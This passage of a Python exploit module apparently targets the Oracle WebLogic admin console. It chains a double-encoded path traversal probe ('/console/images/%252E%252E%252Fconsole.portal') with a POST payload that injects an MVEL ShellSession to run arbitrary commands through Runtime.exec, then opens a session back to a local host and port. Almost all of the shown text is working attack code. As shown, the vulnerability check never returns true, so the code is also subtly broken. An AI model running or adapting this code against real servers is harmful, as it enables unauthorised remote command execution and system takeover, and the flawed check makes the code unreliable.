        payload = f"_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('{command}');\");"

        headers = {
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded"
        }

        self.http_request(method="POST",
                          host=remote_host,
                          port=remote_port,
                          path=path,
                          data=payload)

    def check_vulnerable(self, remote_host, remote_port):
        response = self.http_request(
            method="GET",
            host=remote_host,
            port=remote_port,
            path="/console/images/%252E%252E%252Fconsole.portal")

        if response is None or response.status_code != 200:
            return False

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        if not self.check_vulnerable(remote_host, remote_port):
            self.output_error("Exploit failed!")
            return

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)